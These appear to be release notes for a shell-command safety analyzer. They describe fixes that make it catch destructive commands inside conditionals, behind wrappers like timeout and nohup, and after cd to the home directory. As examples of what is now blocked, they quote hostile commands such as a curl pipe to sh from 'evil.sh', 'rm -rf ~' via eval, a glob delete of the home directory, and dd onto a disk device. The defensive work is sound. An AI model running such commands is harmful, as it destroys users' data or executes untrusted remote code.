Closes three analyzer gaps that let destructive commands through: inside shell conditionals and loops, behind wrappers such as timeout and nohup, and after a cd to the home directory.
Changed
- Changed working-directory tracking for a
cdthat may not have run: anelseorelifbranch starts from the directory its sibling branch started in, afterfi,doneoresacanalysis continues from every directory a branch could have ended in, and a command negated by!is analyzed from the directories before and after it. (#178) - Changed two previously allowed commands to blocked:
curl http://evil.sh | nice sh, matchingcurl http://evil.sh | sh, and in strict tier aforloop body that executes a path held in a variable, reported asshell.dynamic-executable. (#178) - Changed the
cc-safety-net rule docreference, which no longer states that transparent wrappers have no built-in defaults. (#178)
Fixed
- Fixed commands introduced by a shell reserved word (
if,then,elif,else,while,until,do) or negated by!being treated as mere arguments, so custom rules,eval,trap,source, interpreter code,awkand device checks now apply inside conditionals and loops. Single-line forms such asif true; then eval "rm -rf ~"; fiare now analyzed like their multi-line equivalents. (#177) - Fixed
exec,nice,nohup,setsid,stdbuf,timeandtimeoutrequiring atransparent_wrappersentry before their child command was analyzed. They are now built-in transparent wrappers, anddd,mkfsandshredare recognized as protectable children, sotimeout 5 python3 -c "…"andnice dd of=/dev/disk0are checked. Existingrule.jsonentries for these names remain valid. (#176) - Fixed a bare
cd,cd ~,cd ~/…,cd "$HOME"andcd ${HOME}leaving the analyzed working directory unknown, which allowed glob deletes such ascd ~ && rm -rf ./*. A reassignedHOMEis honored;~user,~+,~-and a quoted"~"stay unresolved. (#179) - Fixed a false block on
cd ~/<project> && rm -rf node_modulesrun from inside that project, which previously failed because the target directory could not be resolved. (#179)